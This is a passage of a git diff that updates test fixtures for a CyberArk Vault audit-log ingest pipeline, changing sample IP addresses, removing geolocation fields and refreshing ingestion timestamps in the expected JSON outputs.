Logon\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:28:00\",\"IsoTimestamp\":\"2021-03-14T13:28:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"309\",\"Desc\":\"Undefined User Logon\",\"Severity\":\"Error\",\"Issuer\":\"testark\",\"Action\":\"Undefined User Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Undefined User Logon\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "309", "kind": "event", "action": "authentication_failure", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json index 804841a71be..bac89b31297 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-31-cpm-reconcile-password.log-expected.json @@ -72,7 +72,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:32.839807100Z", + "ingested": "2021-12-09T13:36:54.412027600Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e31\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=dbserver.cyberark.local;username=Administrator2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Version\":\"11.6.0000\",\"MessageID\":\"31\",\"Desc\":\"CPM Reconcile Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=dbserver.cyberark.local;username=Administrator2;\",\"Message\":\"CPM Reconcile Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "31", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json index 4e3c5495fa7..085f60f49b2 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-310-monitor-dr-replication-start.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor dr replication start", - "ingested": "2021-06-09T10:24:32.883718900Z", + "ingested": "2021-12-09T13:36:54.557699900Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"310\",\"Desc\":\"Monitor DR Replication start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication start\",\"GatewayStation\":\"\"}}}", "code": "310", "kind": "event" @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor dr replication start", - "ingested": "2021-06-09T10:24:32.883735400Z", + "ingested": "2021-12-09T13:36:54.557707500Z", "original": "Mar 08 02:48:07 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"310\",\"Desc\":\"Monitor DR Replication start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication start\",\"GatewayStation\":\"\"}}}", "code": "310", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json index fd77767d416..ace8cf5a812 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-311-monitor-dr-replication-end.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "monitor dr replication end", - "ingested": "2021-06-09T10:24:32.928867700Z", + "ingested": "2021-12-09T13:36:54.731499500Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"311\",\"Desc\":\"Monitor DR Replication end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication end\",\"GatewayStation\":\"\"}}}", "code": "311", "kind": "event" @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor dr replication end", - "ingested": "2021-06-09T10:24:32.928881400Z", + "ingested": "2021-12-09T13:36:54.731508200Z", "original": "Mar 08 02:48:07 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"311\",\"Desc\":\"Monitor DR Replication end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor DR Replication end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor DR Replication end\",\"GatewayStation\":\"\"}}}", "code": "311", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log index 41f67cb2add..7763fe77b0f 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log @@ -1 +1 @@ -<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}} +<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json index a994507e65a..69f60d165d0 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-316-reset-user-password-detailed-information.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -46,7 +34,7 @@ "rfc5424": true, "reason": "Password changed", "iso_timestamp": "2021-03-10T18:16:45Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Reset User Password Detailed Information", "source_user": "PSMGw_VAGRANT", "message": "Reset User Password Detailed Information", @@ -61,8 +49,8 @@ "event": { "severity": 2, "action": "reset user password detailed information", - "ingested": "2021-06-09T10:24:32.965227300Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"316\",\"Desc\":\"Reset User Password Detailed Information\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password Detailed Information\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Password changed\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password Detailed Information\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:54.898654500Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"316\",\"Desc\":\"Reset User Password Detailed Information\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password Detailed Information\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Password changed\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password Detailed Information\",\"GatewayStation\":\"\"}}}", "code": "316", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log index f52711e43b9..2ba6ee49eb0 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log @@ -1 +1 @@ -<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}} +<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json index 014c988bed6..684015175d5 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-317-reset-user-password.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -45,7 +33,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T18:16:45Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Reset User Password", "source_user": "PSMGw_VAGRANT", "message": "Reset User Password", @@ -60,8 +48,8 @@ "event": { "severity": 2, "action": "reset user password", - "ingested": "2021-06-09T10:24:32.992212100Z", - "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"317\",\"Desc\":\"Reset User Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:54.999436800Z", + "original": "\u003c5\u003e1 2021-03-10T18:16:45Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:45\",\"IsoTimestamp\":\"2021-03-10T18:16:45Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"317\",\"Desc\":\"Reset User Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Reset User Password\",\"SourceUser\":\"PSMGw_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Reset User Password\",\"GatewayStation\":\"\"}}}", "code": "317", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log index 6aee911c509..3e513ad1c03 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-32-add-owner.log @@ -1,16 +1,16 @@ -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}} -<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add 